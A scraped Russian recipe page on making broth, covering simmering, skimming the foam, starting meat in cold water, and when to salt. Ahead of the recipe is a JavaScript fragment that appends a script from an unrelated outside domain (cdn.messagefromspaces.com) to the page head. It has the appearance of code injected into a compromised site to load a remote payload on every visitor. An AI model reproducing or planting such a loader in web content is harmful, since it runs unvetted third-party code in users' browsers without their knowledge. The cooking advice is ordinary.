Бульон , 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Бульон

Чтобы сварить достойное первое блюдо кулинары обычно варят бульон, так как он состоит в основе многих кулинарных блюд. Бульон-это навар говядины, баранины, рыбы, домашней птицы или дичи. Все бульоны варятся при медленном кипении. При первом и втором закипании с поверхности бульона снимают накопившуюся пену.
Всякое мясо ставя варить заливают холодной водой, от этого бульон получается вкуснее. Мясо залитое горячей водой будет вкуснее, но бульон получается мутноватый и менее вкусный. Бульон варят с морковью и луком, солят в половине готовности. Бульоны употребляют для приготовления первых блюд и соусов.

Другие рецепты:

Comments are closed.